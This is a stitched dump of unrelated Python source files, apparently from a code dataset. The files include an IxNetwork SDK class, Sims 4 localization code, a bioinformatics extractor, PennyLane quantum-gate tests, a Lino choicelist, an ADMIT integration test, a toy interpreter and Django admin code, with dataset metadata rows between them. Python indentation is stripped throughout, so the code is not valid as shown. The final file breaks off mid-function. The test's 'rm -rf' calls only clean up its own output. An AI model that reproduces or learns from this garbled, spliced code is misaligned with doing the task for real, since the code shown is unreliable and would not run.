Returns
-------
- number: The user priority of the Base VLAN.
"""
return self._get_attribute(self._SDM_ATT_MAP['BVlanPriority'])
@BVlanPriority.setter
def BVlanPriority(self, value):
self._set_attribute(self._SDM_ATT_MAP['BVlanPriority'], value)
@property
def BVlanTpId(self):
"""
Returns
-------
- number: The tag priority identifier for base VLAN.
"""
return self._get_attribute(self._SDM_ATT_MAP['BVlanTpId'])
@BVlanTpId.setter
def BVlanTpId(self, value):
self._set_attribute(self._SDM_ATT_MAP['BVlanTpId'], value)
@property
def BaseVid(self):
"""
Returns
-------
- number: The Base VLAN ID. The default value is 1. The maximum value is 4095. The minimum value is 0.
"""
return self._get_attribute(self._SDM_ATT_MAP['BaseVid'])
@BaseVid.setter
def BaseVid(self, value):
self._set_attribute(self._SDM_ATT_MAP['BaseVid'], value)
@property
def EctAlgorithm(self):
"""
Returns
-------
- number: The SPB Equal Cost Tree (ECT) algorithm. The default algorithm is 01-80-C2-01.
"""
return self._get_attribute(self._SDM_ATT_MAP['EctAlgorithm'])
@EctAlgorithm.setter
def EctAlgorithm(self, value):
self._set_attribute(self._SDM_ATT_MAP['EctAlgorithm'], value)
@property
def UseFlag(self):
"""
Returns
-------
- bool: Set to true to activate the user flag.
"""
return self._get_attribute(self._SDM_ATT_MAP['UseFlag'])
@UseFlag.setter
def UseFlag(self, value):
self._set_attribute(self._SDM_ATT_MAP['UseFlag'], value)
def update(self, BVlanPriority=None, BVlanTpId=None, BaseVid=None, EctAlgorithm=None, UseFlag=None):
"""Updates spbmNodeBaseVidRange resource on the server.
Args
----
- BVlanPriority (number): The user priority of the Base VLAN.
- BVlanTpId (number): The tag priority identifier for base VLAN.
- BaseVid (number): The Base VLAN ID. The default value is 1. The maximum value is 4095. The minimum value is 0.
- EctAlgorithm (number): The SPB Equal Cost Tree (ECT) algorithm. The default algorithm is 01-80-C2-01.
- UseFlag (bool): Set to true to activate the user flag.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, BVlanPriority=None, BVlanTpId=None, BaseVid=None, EctAlgorithm=None, UseFlag=None):
"""Adds a new spbmNodeBaseVidRange resource on the server and adds it to the container.
Args
----
- BVlanPriority (number): The user priority of the Base VLAN.
- BVlanTpId (number): The tag priority identifier for base VLAN.
- BaseVid (number): The Base VLAN ID. The default value is 1. The maximum value is 4095. The minimum value is 0.
- EctAlgorithm (number): The SPB Equal Cost Tree (ECT) algorithm. The default algorithm is 01-80-C2-01.
- UseFlag (bool): Set to true to activate the user flag.
Returns
-------
- self: This instance with all currently retrieved spbmNodeBaseVidRange resources using find and the newly added spbmNodeBaseVidRange resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained spbmNodeBaseVidRange resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, BVlanPriority=None, BVlanTpId=None, BaseVid=None, EctAlgorithm=None, UseFlag=None):
"""Finds and retrieves spbmNodeBaseVidRange resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve spbmNodeBaseVidRange resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all spbmNodeBaseVidRange resources from the server.
Args
----
- BVlanPriority (number): The user priority of the Base VLAN.
- BVlanTpId (number): The tag priority identifier for base VLAN.
- BaseVid (number): The Base VLAN ID. The default value is 1. The maximum value is 4095. The minimum value is 0.
- EctAlgorithm (number): The SPB Equal Cost Tree (ECT) algorithm. The default algorithm is 01-80-C2-01.
- UseFlag (bool): Set to true to activate the user flag.
Returns
-------
- self: This instance with matching spbmNodeBaseVidRange resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of spbmNodeBaseVidRange data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the spbmNodeBaseVidRange resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
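# Illustrative usage sketch (not part of the generated SDK): assumes an
# established ixnetwork_restpy session whose ISIS/SPB protocol node (here
# called `spb_router`) exposes this class.
#   vid_ranges = spb_router.SpbmNodeBaseVidRange.find()            # fetch all
#   vid_range = spb_router.SpbmNodeBaseVidRange.add(BaseVid=100,
#                                                   BVlanPriority=3,
#                                                   UseFlag=True)  # create one
#   vid_range.update(EctAlgorithm=1)                               # push a change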
# ---- File: /EA/core/sims4/localization/localization_validation.py (repo: daniela-venuta/Sims-4-Python-Script-Workspace) ----
from protocolbuffers.Localization_pb2 import LocalizedStringToken
import sims4.log
import sims4.reload
logger = sims4.log.Logger('Localization', default_owner='epanero')
with sims4.reload.protected(globals()):
_localized_string_validators = {}
def register_localized_string_validator(validator_gen):
key = validator_gen.__module__ + validator_gen.__qualname__
_localized_string_validators[key] = validator_gen
def get_all_strings_to_validate_gen():
for validator_gen in _localized_string_validators.values():
try:
for localized_string_msg in validator_gen():
if localized_string_msg.hash:
yield localized_string_msg
except Exception as ex:
logger.error('Validator {} threw an exception: {}', validator_gen, ex)
class _LocalizationValidatorPlaceholderSim:
def __init__(self, is_female=False):
self._first_name = 'Jane' if is_female else 'John'
self._last_name = 'Doe'
self._is_female = is_female
def populate_localization_token(self, token):
token.type = LocalizedStringToken.SIM
token.first_name = self._first_name
token.last_name = self._last_name
token.is_female = self._is_female
def get_random_localization_token_sim(*args, **kwargs):
return _LocalizationValidatorPlaceholderSim(*args, **kwargs)
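# Illustrative sketch: hooking a generator into the registry above.
# `_my_strings_gen` and `some_localized_string_msg` are hypothetical; any
# yielded LocalizedString protobuf with a non-zero `hash` is surfaced by
# get_all_strings_to_validate_gen().
#   def _my_strings_gen():
#       yield some_localized_string_msg
#   register_localized_string_validator(_my_strings_gen)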
# ---- File: /scripts/extract_sequences.py (repo: mahajrod/MAVR, license: MIT) ----
#!/usr/bin/env python2
__author__ = 'mahajrod'
import argparse
import os
from Bio import SeqIO
from BCBio import GFF
parser = argparse.ArgumentParser()
parser.add_argument("-g", "--in_gff", action="store", dest="in_gff",
help="input gff file")
parser.add_argument("-i", "--in_fasta", action="store", dest="in_fasta",
help="input fasta file")
parser.add_argument("-o", "--out_fasta", action="store", dest="out_fasta",
help="output fasta file")
args = parser.parse_args()
#sequence_dict = SeqIO.index_db("temp_index.idx", [args.in_fasta], format="fasta")
sequence_dict = SeqIO.to_dict(SeqIO.parse(args.in_fasta, format="fasta"))
annotated_dict = {}
with open(args.in_gff, "r") as gff_fd:
for record in GFF.parse(gff_fd, base_dict=sequence_dict):
annotated_dict[record.id] = record
#print(annotated_dict['2R'].features[25])
with open(args.out_fasta, "w") as out_fd:
for record in annotated_dict:
for feature in annotated_dict[record].features:
#print(feature.qualifiers)
feature_location = "%s:%s-%s:%s" % (record, feature.location.start,
feature.location.end, feature.location.strand)
feature_id = ",".join(feature.qualifiers["Parent"]) if "Parent" in feature.qualifiers \
else ",".join(feature.qualifiers["ID"]) if "ID" in feature.qualifiers else "."
feature_name = ",".join(feature.qualifiers["Name"]) if "Name" in feature.qualifiers else "."
feature_seq = feature.extract(annotated_dict[record].seq)
out_fd.write(">%s|%s|%s\n" % (feature_location, feature_id, feature_name))
out_fd.write(str(feature_seq) + "\n")
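# Example invocation (assumes biopython and bcbio-gff are installed):
#   python extract_sequences.py -g annotations.gff -i genome.fasta -o features.fasta
# Each output FASTA header has the form "<record>:<start>-<end>:<strand>|<id>|<name>".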
#os.system("rm temp_index.idx")
# ---- File: /tests/devices/qubit/test_apply_operation.py (repo: therooler/pennylane, license: Apache-2.0) ----
# Copyright 2018-2023 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests the apply_operation functions from devices/qubit
"""
import pytest
import numpy as np
from scipy.stats import unitary_group
import pennylane as qml
from pennylane.devices.qubit.apply_operation import (
apply_operation,
apply_operation_einsum,
apply_operation_tensordot,
)
ml_frameworks_list = [
"numpy",
pytest.param("autograd", marks=pytest.mark.autograd),
pytest.param("jax", marks=pytest.mark.jax),
pytest.param("torch", marks=pytest.mark.torch),
pytest.param("tensorflow", marks=pytest.mark.tf),
]
methods = [apply_operation_einsum, apply_operation_tensordot, apply_operation]
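# Quick illustrative sketch (not one of the tests below): apply_operation maps a
# state of shape (2,) * num_wires to a new state of the same shape, e.g.
#   state = np.zeros((2, 2)); state[0, 0] = 1.0        # |00>
#   new_state = apply_operation(qml.PauliX(0), state)  # flips wire 0 -> |10>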
def test_custom_operator_with_matrix():
"""Test that apply_operation works with any operation that defines a matrix."""
mat = np.array(
[
[0.39918205 + 0.3024376j, -0.86421077 + 0.04821758j],
[0.73240679 + 0.46126509j, 0.49576832 - 0.07091251j],
]
)
# pylint: disable=too-few-public-methods
class CustomOp(qml.operation.Operation):
num_wires = 1
def matrix(self):
return mat
state = np.array([-0.30688912 - 0.4768824j, 0.8100052 - 0.14931113j])
new_state = apply_operation(CustomOp(0), state)
assert qml.math.allclose(new_state, mat @ state)
@pytest.mark.parametrize("ml_framework", ml_frameworks_list)
@pytest.mark.parametrize("method", methods)
@pytest.mark.parametrize("wire", (0, 1))
class TestTwoQubitStateSpecialCases:
"""Test the special cases on a two qubit state. Also tests the special cases for einsum and tensor application methods
for additional testing of these generic matrix application methods."""
def test_paulix(self, method, wire, ml_framework):
"""Test the application of a paulix gate on a two qubit state."""
initial_state = np.array(
[
[0.04624539 + 0.3895457j, 0.22399401 + 0.53870339j],
[-0.483054 + 0.2468498j, -0.02772249 - 0.45901669j],
]
)
initial_state = qml.math.asarray(initial_state, like=ml_framework)
new_state = method(qml.PauliX(wire), initial_state)
initial0dim = qml.math.take(initial_state, 0, axis=wire)
new1dim = qml.math.take(new_state, 1, axis=wire)
assert qml.math.allclose(initial0dim, new1dim)
initial1dim = qml.math.take(initial_state, 1, axis=wire)
new0dim = qml.math.take(new_state, 0, axis=wire)
assert qml.math.allclose(initial1dim, new0dim)
def test_pauliz(self, method, wire, ml_framework):
"""Test the application of a pauliz gate on a two qubit state."""
initial_state = np.array(
[
[0.04624539 + 0.3895457j, 0.22399401 + 0.53870339j],
[-0.483054 + 0.2468498j, -0.02772249 - 0.45901669j],
]
)
initial_state = qml.math.asarray(initial_state, like=ml_framework)
new_state = method(qml.PauliZ(wire), initial_state)
initial0 = qml.math.take(initial_state, 0, axis=wire)
new0 = qml.math.take(new_state, 0, axis=wire)
assert qml.math.allclose(initial0, new0)
initial1 = qml.math.take(initial_state, 1, axis=wire)
new1 = qml.math.take(new_state, 1, axis=wire)
assert qml.math.allclose(initial1, -new1)
def test_pauliy(self, method, wire, ml_framework):
"""Test the application of a pauliy gate on a two qubit state."""
initial_state = np.array(
[
[0.04624539 + 0.3895457j, 0.22399401 + 0.53870339j],
[-0.483054 + 0.2468498j, -0.02772249 - 0.45901669j],
]
)
initial_state = qml.math.asarray(initial_state, like=ml_framework)
new_state = method(qml.PauliY(wire), initial_state)
initial0 = qml.math.take(initial_state, 0, axis=wire)
new1 = qml.math.take(new_state, 1, axis=wire)
assert qml.math.allclose(1j * initial0, new1)
initial1 = qml.math.take(initial_state, 1, axis=wire)
new0 = qml.math.take(new_state, 0, axis=wire)
assert qml.math.allclose(-1j * initial1, new0)
def test_hadamard(self, method, wire, ml_framework):
"""Test the application of a hadamard on a two qubit state."""
initial_state = np.array(
[
[0.04624539 + 0.3895457j, 0.22399401 + 0.53870339j],
[-0.483054 + 0.2468498j, -0.02772249 - 0.45901669j],
]
)
initial_state = qml.math.asarray(initial_state, like=ml_framework)
new_state = method(qml.Hadamard(wire), initial_state)
inv_sqrt2 = 1 / np.sqrt(2)
initial0 = qml.math.take(initial_state, 0, axis=wire)
initial1 = qml.math.take(initial_state, 1, axis=wire)
expected0 = inv_sqrt2 * (initial0 + initial1)
new0 = qml.math.take(new_state, 0, axis=wire)
assert qml.math.allclose(new0, expected0)
expected1 = inv_sqrt2 * (initial0 - initial1)
new1 = qml.math.take(new_state, 1, axis=wire)
assert qml.math.allclose(new1, expected1)
def test_phaseshift(self, method, wire, ml_framework):
"""test the application of a phaseshift gate on a two qubit state."""
initial_state = np.array(
[
[0.04624539 + 0.3895457j, 0.22399401 + 0.53870339j],
[-0.483054 + 0.2468498j, -0.02772249 - 0.45901669j],
]
)
initial_state = qml.math.asarray(initial_state, like=ml_framework)
phase = qml.math.asarray(-2.3, like=ml_framework)
shift = np.exp(qml.math.multiply(1j, phase))
new_state = method(qml.PhaseShift(phase, wire), initial_state)
new0 = qml.math.take(new_state, 0, axis=wire)
initial0 = qml.math.take(initial_state, 0, axis=wire)
assert qml.math.allclose(new0, initial0)
initial1 = qml.math.take(initial_state, 1, axis=wire)
new1 = qml.math.take(new_state, 1, axis=wire)
assert qml.math.allclose(shift * initial1, new1)
def test_cnot(self, method, wire, ml_framework):
"""Test the application of a cnot gate on a two qubit state."""
initial_state = np.array(
[
[0.04624539 + 0.3895457j, 0.22399401 + 0.53870339j],
[-0.483054 + 0.2468498j, -0.02772249 - 0.45901669j],
]
)
initial_state = qml.math.asarray(initial_state, like=ml_framework)
control = wire
target = int(not control)
new_state = method(qml.CNOT((control, target)), initial_state)
initial0 = qml.math.take(initial_state, 0, axis=control)
new0 = qml.math.take(new_state, 0, axis=control)
assert qml.math.allclose(initial0, new0)
initial1 = qml.math.take(initial_state, 1, axis=control)
new1 = qml.math.take(new_state, 1, axis=control)
assert qml.math.allclose(initial1[1], new1[0])
assert qml.math.allclose(initial1[0], new1[1])
@pytest.mark.parametrize("method", methods)
class TestRXCalcGrad:
"""Tests the application and differentiation of an RX gate in the different interfaces."""
state = np.array(
[
[
[-0.22209168 + 0.21687383j, -0.1302055 - 0.06014422j],
[-0.24033117 + 0.28282153j, -0.14025702 - 0.13125938j],
],
[
[-0.42373896 + 0.51912421j, -0.01934135 + 0.07422255j],
[0.22311677 + 0.2245953j, 0.33154166 + 0.20820744j],
],
]
)
def compare_expected_result(self, phi, state, new_state, g):
expected0 = np.cos(phi / 2) * state[0, :, :] + -1j * np.sin(phi / 2) * state[1, :, :]
expected1 = -1j * np.sin(phi / 2) * state[0, :, :] + np.cos(phi / 2) * state[1, :, :]
assert qml.math.allclose(new_state[0, :, :], expected0)
assert qml.math.allclose(new_state[1, :, :], expected1)
g_expected0 = (
-0.5 * np.sin(phi / 2) * state[0, :, :] - 0.5j * np.cos(phi / 2) * state[1, :, :]
)
g_expected1 = (
-0.5j * np.cos(phi / 2) * state[0, :, :] - 0.5 * np.sin(phi / 2) * state[1, :, :]
)
assert qml.math.allclose(g[0], g_expected0)
assert qml.math.allclose(g[1], g_expected1)
@pytest.mark.autograd
def test_rx_grad_autograd(self, method):
"""Test that the application of an rx gate is differentiable with autograd."""
state = qml.numpy.array(self.state)
def f(phi):
op = qml.RX(phi, wires=0)
return method(op, state)
phi = qml.numpy.array(0.325 + 0j, requires_grad=True)
new_state = f(phi)
g = qml.jacobian(lambda x: qml.math.real(f(x)))(phi)
self.compare_expected_result(phi, state, new_state, g)
@pytest.mark.jax
@pytest.mark.parametrize("use_jit", (True, False))
def test_rx_grad_jax(self, method, use_jit):
"""Test that the application of an rx gate is differentiable with jax."""
import jax
state = jax.numpy.array(self.state)
def f(phi):
op = qml.RX(phi, wires=0)
return method(op, state)
if use_jit:
f = jax.jit(f)
phi = 0.325
new_state = f(phi)
g = jax.jacobian(f, holomorphic=True)(phi + 0j)
self.compare_expected_result(phi, state, new_state, g)
@pytest.mark.torch
def test_rx_grad_torch(self, method):
"""Tests the application and differentiation of an rx gate with torch."""
import torch
state = torch.tensor(self.state)
def f(phi):
op = qml.RX(phi, wires=0)
return method(op, state)
phi = torch.tensor(0.325, requires_grad=True)
new_state = f(phi)
g = torch.autograd.functional.jacobian(f, phi + 0j)
# torch takes gradient with respect to conj(z), so we need to conj the gradient
g = torch.conj(g).resolve_conj()
self.compare_expected_result(
phi.detach().numpy(),
state.detach().numpy(),
new_state.detach().numpy(),
g.detach().numpy(),
)
@pytest.mark.tf
def test_rx_grad_tf(self, method):
"""Tests the application and differentiation of an rx gate with tensorflow"""
import tensorflow as tf
state = tf.Variable(self.state)
phi = tf.Variable(0.8589 + 0j)
with tf.GradientTape() as grad_tape:
op = qml.RX(phi, wires=0)
new_state = method(op, state)
grads = grad_tape.jacobian(new_state, [phi])
# tf takes gradient with respect to conj(z), so we need to conj the gradient
phi_grad = tf.math.conj(grads[0])
self.compare_expected_result(phi, state, new_state, phi_grad)
@pytest.mark.parametrize("ml_framework", ml_frameworks_list)
@pytest.mark.parametrize("method", methods)
class TestBroadcasting: # pylint: disable=too-few-public-methods
"""Tests that broadcasted operations are applied correctly."""
broadcasted_ops = [
qml.RX(np.array([np.pi, np.pi / 2, np.pi / 4]), wires=2),
qml.PhaseShift(np.array([np.pi, np.pi / 2, np.pi / 4]), wires=2),
qml.IsingXX(np.array([np.pi, np.pi / 2, np.pi / 4]), wires=[1, 2]),
qml.QubitUnitary(
np.array([unitary_group.rvs(8), unitary_group.rvs(8), unitary_group.rvs(8)]),
wires=[0, 1, 2],
),
]
unbroadcasted_ops = [
qml.PauliX(2),
qml.PauliZ(2),
qml.CNOT([1, 2]),
qml.RX(np.pi, wires=2),
qml.PhaseShift(np.pi / 2, wires=2),
qml.IsingXX(np.pi / 2, wires=[1, 2]),
qml.QubitUnitary(unitary_group.rvs(8), wires=[0, 1, 2]),
]
@pytest.mark.parametrize("op", broadcasted_ops)
def test_broadcasted_op(self, op, method, ml_framework):
"""Tests that batched operations are applied correctly to an unbatched state."""
state = np.ones((2, 2, 2)) / np.sqrt(8)
res = method(op, qml.math.asarray(state, like=ml_framework))
missing_wires = 3 - len(op.wires)
mat = op.matrix()
expanded_mat = [
np.kron(np.eye(2**missing_wires), mat[i]) if missing_wires else mat[i]
for i in range(3)
]
expected = [(expanded_mat[i] @ state.flatten()).reshape((2, 2, 2)) for i in range(3)]
assert qml.math.get_interface(res) == ml_framework
assert qml.math.allclose(res, expected)
@pytest.mark.parametrize("op", unbroadcasted_ops)
def test_broadcasted_state(self, op, method, ml_framework):
"""Tests that unbatched operations are applied correctly to a batched state."""
state = np.ones((3, 2, 2, 2)) / np.sqrt(8)
res = method(op, qml.math.asarray(state, like=ml_framework), is_state_batched=True)
missing_wires = 3 - len(op.wires)
mat = op.matrix()
expanded_mat = np.kron(np.eye(2**missing_wires), mat) if missing_wires else mat
expected = [(expanded_mat @ state[i].flatten()).reshape((2, 2, 2)) for i in range(3)]
assert qml.math.get_interface(res) == ml_framework
assert qml.math.allclose(res, expected)
@pytest.mark.parametrize("op", broadcasted_ops)
def test_broadcasted_op_broadcasted_state(self, op, method, ml_framework):
"""Tests that batched operations are applied correctly to a batched state."""
if method is apply_operation_tensordot:
pytest.skip("Tensordot doesn't support batched operator and batched state.")
state = np.ones((3, 2, 2, 2)) / np.sqrt(8)
res = method(op, qml.math.asarray(state, like=ml_framework), is_state_batched=True)
missing_wires = 3 - len(op.wires)
mat = op.matrix()
expanded_mat = [
np.kron(np.eye(2**missing_wires), mat[i]) if missing_wires else mat[i]
for i in range(3)
]
expected = [(expanded_mat[i] @ state[i].flatten()).reshape((2, 2, 2)) for i in range(3)]
assert qml.math.get_interface(res) == ml_framework
assert qml.math.allclose(res, expected)
@pytest.mark.parametrize("method", methods)
class TestLargerOperations:
"""Tests matrix applications on states and operations with larger numbers of wires."""
state = np.array(
[
[
[
[-0.21733955 - 0.01990267j, 0.22960893 - 0.0312392j],
[0.21406652 - 0.07552019j, 0.09527143 + 0.01870987j],
],
[
[0.05603182 - 0.26879067j, -0.02755183 - 0.03097822j],
[-0.43962358 - 0.17435254j, 0.12820737 + 0.06794554j],
],
],
[
[
[-0.09270161 - 0.3132961j, -0.03276799 + 0.07557535j],
[-0.15712707 - 0.32666969j, -0.00898954 + 0.1324474j],
],
[
[-0.17760532 + 0.08415488j, -0.26872752 - 0.05767781j],
[0.23142582 - 0.1970496j, 0.15483611 - 0.15100495j],
],
],
]
)
def test_multicontrolledx(self, method):
"""Tests a four qubit multi-controlled x gate."""
new_state = method(qml.MultiControlledX(wires=(0, 1, 2, 3)), self.state)
expected_state = np.copy(self.state)
expected_state[1, 1, 1, 1] = self.state[1, 1, 1, 0]
expected_state[1, 1, 1, 0] = self.state[1, 1, 1, 1]
assert qml.math.allclose(new_state, expected_state)
def test_double_excitation(self, method):
"""Tests a double excitation operation compared to its decomposition."""
op = qml.DoubleExcitation(np.array(2.14), wires=(3, 1, 2, 0))
state_v1 = method(op, self.state)
state_v2 = self.state
for d_op in op.decomposition():
state_v2 = method(d_op, state_v2)
assert qml.math.allclose(state_v1, state_v2)
@pytest.mark.tf
@pytest.mark.parametrize("op", (qml.PauliZ(8), qml.CNOT((5, 6))))
def test_tf_large_state(op):
""" "Tests that custom kernels that use slicing fall back to a different method when
the state has a large number of wires."""
import tensorflow as tf
state = np.zeros([2] * 10)
state = tf.Variable(state)
new_state = apply_operation(op, state)
# still all zeros. Mostly just making sure error not raised
assert qml.math.allclose(state, new_state)
# ---- File: /__old_stuff/pga/pga_no_sort/maps.py (repo: ralphbean/ms-thesis) ----
#!/usr/bin/python
from math import cos, sin, atan2, sqrt
# Some constants:
e = 2.71828183
mu = 5.5
a = 5
b = 25
W = [[ -a, a], [-b, b]]
def sigmoid( x, mu ):
return [( 1 + e**(-mu * ele))**-1 for ele in x]
def logistic( X, mu):
Y = [X[0], X[1]]
Y[0] = Y[0] * ( 1.0 - Y[0]) * mu
Y[1] = Y[1] * ( 1.0 - Y[1]) * mu
return Y
def squeezer( X, a ):
x = X[0]
y = X[1]
u = x
v = y/2.0 + (sqrt(1-x**2))/2.0
r = sqrt(v**2 + u**2)
theta = 2 * atan2(u,v)
u = a * r * cos(theta)
v = r * sin(theta)
Y = [u, v]
return Y
def network( x ):
return sigmoid( [-a * x[0] + a * x[1], -b * x[0] + b * x[1] ], mu )
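# Illustrative driver (not in the original script): iterate the coupled
# sigmoid network map from an arbitrary starting point.
if __name__ == '__main__':
    x = [0.2, 0.4]
    for _ in range(10):
        x = network(x)  # each step maps [0,1]^2 back into [0,1]^2 via the sigmoid
    print(x)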
# ---- File: /lino_xl/lib/phones/choicelists.py (repo: khchine5/xl, license: BSD-2-Clause) ----
# Copyright 2017 Luc Saffre
#
# License: BSD (see file COPYING for details)
from django.core.validators import validate_email, URLValidator
from etgen.html import E
from lino.api import dd, _
from lino.modlib.office.roles import OfficeStaff
validate_url = URLValidator()
class ContactDetailType(dd.Choice):
field_name = None
def format(self, value):
return value
def validate(self, value):
return value
def as_html(self, obj, ar):
return obj.value
STD = ContactDetailType
class EMAIL(ContactDetailType):
def validate(self, value):
validate_email(value)
def as_html(self, obj, ar):
return E.a(obj.value, href="mailto:" + obj.value)
class URL(ContactDetailType):
def validate(self, value):
validate_url(value)
def as_html(self, obj, ar):
txt = obj.remark or obj.value
return E.a(txt, href=obj.value)
class ContactDetailTypes(dd.ChoiceList):
required_roles = dd.login_required(OfficeStaff)
verbose_name = _("Contact detail type")
verbose_name_plural = _("Contact detail types")
item_class = ContactDetailType
add = ContactDetailTypes.add_item_instance
add(EMAIL('010', _("E-Mail"), 'email', field_name="email"))
add(STD('020', _("Mobile"), 'gsm', field_name="gsm"))
add(STD('030', _("Phone"), 'phone', field_name="phone"))
add(URL('040', _("Website"), 'url', field_name="url"))
add(STD('050', _("Fax"), 'fax', field_name="fax"))
add(STD('090', _("Other"), 'other'))
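# Illustrative sketch (assumes a configured Lino site): choices registered
# above become attributes of the choicelist, e.g.
#   ContactDetailTypes.email.field_name  # 'email'
#   ContactDetailTypes.gsm.value         # '020'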
# ---- File: /admit/at/test/integrationtest_moment.py (repo: astroumd/admit, license: MIT) ----
#! /usr/bin/env casarun
#
#
# you can either use the "import" method from within casapy
# or use the casarun shortcut to run this from a unix shell
# with the argument being the casa image file to be processed
#
""" Right now you need to run this test inside of casapy
This test does the following:
creates an admit class
creates a moment AT
sets some moment parameters
adds the moment AT to the admit class
runs admit (which in turn runs the needed AT's)
writes the results out to disk
reads them into a new admit instance
prints out one of the BDP xml file names
to run this test do the following:
import admit.at.test.test_moment as tm
tm.run(<filename>) <filename> is the name of the image file to be processed (note for the time being you need to be in the directory containing the image file
"""
import admit
import unittest
import os
import sys
import traceback
class IntegTestMomentAT(unittest.TestCase):
def setUp(self):
self.root = admit.utils.admit_root()
self.inputFile = self.root + "/admit/at/test/mom_integ_test_input.fits"
self.admitdir = self.root + "/admit/at/test/mom_integ_test_input.admit"
self.testoutput = self.root+"/INTEGTESTRESULT"
self.success = "FAILED"
self.cleanup()
def tearDown(self):
self.cleanup()
self.cleanlogs()
f = open(self.testoutput,"a")
f.write(self.success+ " "+self.__class__.__name__ + "\n")
f.close()
def cleanup(self):
try:
cmd = "/bin/rm -rf %s*" % self.admitdir
os.system( cmd )
except Exception as ex:
print "failed to remove admit dir %s :" % self.admitdir
print ex
# cleanlogs is separate because we don't want to remove logs we might
# be writing to.
def cleanlogs(self):
try:
os.system("/bin/rm -rf ipython*.log")
except:
print "failed to remove ipython logs"
try:
os.system("/bin/rm -rf casapy*.log")
except:
print "failed to remove casapy logs"
# Call the main method runTest() for automatic running.
#
# NB: don't use "run()" - it conflicts unittest.TestCase run()
# method and you get side effects, e.g. fileName =
# <unittest.runner.TextTestResult run=0 errors=0 failures=0>
#
def runTest(self):
try:
# instantiate the Admit class
a = admit.Project(self.admitdir)
# set up to write out figure files
a.plotparams(admit.PlotControl.BATCH,admit.PlotControl.PNG)
fitsin = admit.Ingest_AT(file=self.inputFile)
task0id = a.addtask(fitsin)
# instantiate a moment AT and set some moment parameters
m = admit.Moment_AT()
m.setkey('moments',[0,1,2])
m.setkey('sigma',0.005)
m.setkey('numsigma',[3.0])
task1id = a.addtask(m,[(task0id,0)])
# check the fm
a.fm.verify()
# run admit
a.run()
# save it out to disk.
a.write()
a2 = admit.Project(self.admitdir) # read in the admit.xml and bdp files
self.assertEqual(len(a.fm),len(a2.fm))
for atask in a.fm:
self.assertEqual(len(a.fm[atask]._bdp_out),
len(a2.fm[atask]._bdp_out))
# Note: we don't check bdp_in because they are connected
# "just in time" so will be set None up read-in.
self.assertEqual(a.fm._connmap,a2.fm._connmap)
for at in a.fm:
for i in range(len(a.fm[at]._bdp_out)) :
self.assertEqual( a.fm[at]._bdp_out[i]._taskid,
a2.fm[at]._bdp_out[i]._taskid)
self.assertEqual( a.fm[at]._bdp_out[i].xmlFile,
a2.fm[at]._bdp_out[i].xmlFile)
self.success = "OK"
except Exception, e:
m = "exception=%s, file=%s, lineno=%s" % ( sys.exc_info()[0].__name__, os.path.basename(sys.exc_info()[2].tb_frame.f_code.co_filename), sys.exc_info()[2].tb_lineno)
self.success = "FAILED"
traceback.print_exc()
self.fail("%s failed with: %s" % (self.__class__.__name__ , m))
###############################################################################
# END CLASS #
###############################################################################
suite = unittest.TestLoader().loadTestsFromTestCase(IntegTestMomentAT)
unittest.TextTestRunner(verbosity=0).run(suite)
| [
"[email protected]"
]
| |
3441be0b35ed322cb32bf6ba5f4e7431d88160a2 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/5/nsj.py | f710dc66040e9b9bd32fa4cffb1a45033aa46a3b | []
| no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'nsJ':
printFunction(data[1:])
else:
print 'ERROR'
return
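# Example input (assumption inferred from the parser above): a line prints only
# when its first token is the literal 'nsJ' and the payload is quote-delimited:
#   nsJ " hello world "        -> prints: hello world
# Any other leading token prints 'ERROR' and stops processing.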
if __name__ == '__main__':
    main(sys.argv[1])
# ---- File: /justpy/02_basics/hello.py (repo: damiansp/completePython) ----
import justpy as jp
def hello():
wp = jp.WebPage()
p = jp.P(text='Hello, World!', a=wp)
return wp
jp.justpy(hello)
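# Running this module starts JustPy's built-in web server (by default on
# http://127.0.0.1:8000) and serves the page returned by hello().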
# ---- File: /admin-web/src/www/application/modules/exon/actions.py (repo: duytran92-cse/nas-genodata) ----
from django.http import HttpResponse, HttpResponseRedirect
from django.conf import settings
from notasquare.urad_web import actions, page_contexts, widgets
from notasquare.urad_web_material import renderers
from application import constants
from . import components
import json
class List(actions.crud.ListAction):
def create_page_context(self):
return components.FullPageContext(self.params, self.container)
class TableRenderer(renderers.widgets.table.DataTableRenderer):
def render_cell_actions(self, table, row):
html = '<div class="btn-group btn-group">'
html += ' <a class="btn btn-xs btn-primary" href="/exon/update/%s">Edit</a>' % (row['id'])
